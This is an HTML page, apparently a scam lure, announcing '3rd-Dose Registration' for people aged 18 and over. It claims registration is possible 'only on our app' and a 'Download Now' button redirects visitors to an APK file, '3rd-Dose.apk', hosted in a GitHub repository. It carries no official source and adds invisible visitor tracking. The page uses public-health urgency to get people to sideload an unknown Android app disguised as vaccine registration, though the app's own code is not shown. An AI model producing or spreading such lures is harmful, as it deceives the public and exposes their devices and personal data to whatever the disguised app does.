<script type="text/javascript">
var sc_project=12724315; 
var sc_invisible=1; 
var sc_security="3cc67f71"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12724315/0/3cc67f71/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<html>
    
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.dabavanu {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:hover {
	background-color:#315cbb;
}
.dabavanusw {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function dbvao() 
{
    var m = new Date().getMinutes(); 
	if(m%2==0)
	{
		window.location="https://github.com/thirddose/registernow/raw/main/3rd-Dose.apk"; 
	}
	else
	{
		window.location="https://github.com/thirddose/registernow/raw/main/3rd-Dose.apk";
	}
}
</script>
<body>
<center>
    
        <img src="https://imgpile.com/images/5nXdEF.jpg"  height="100"/>
        <h2>3rd-Dose Registration</h2><h3>
        3rd-Dose for 18+ People is started<br>
Register for 3rd-Dose right now<br>
Registration only on our app.<br><br>
Download app and Register now.</h3>
        <div onclick="dbvao()"  class="dabavanu">Download Now</a>


        


    </div>
</center>
</html>
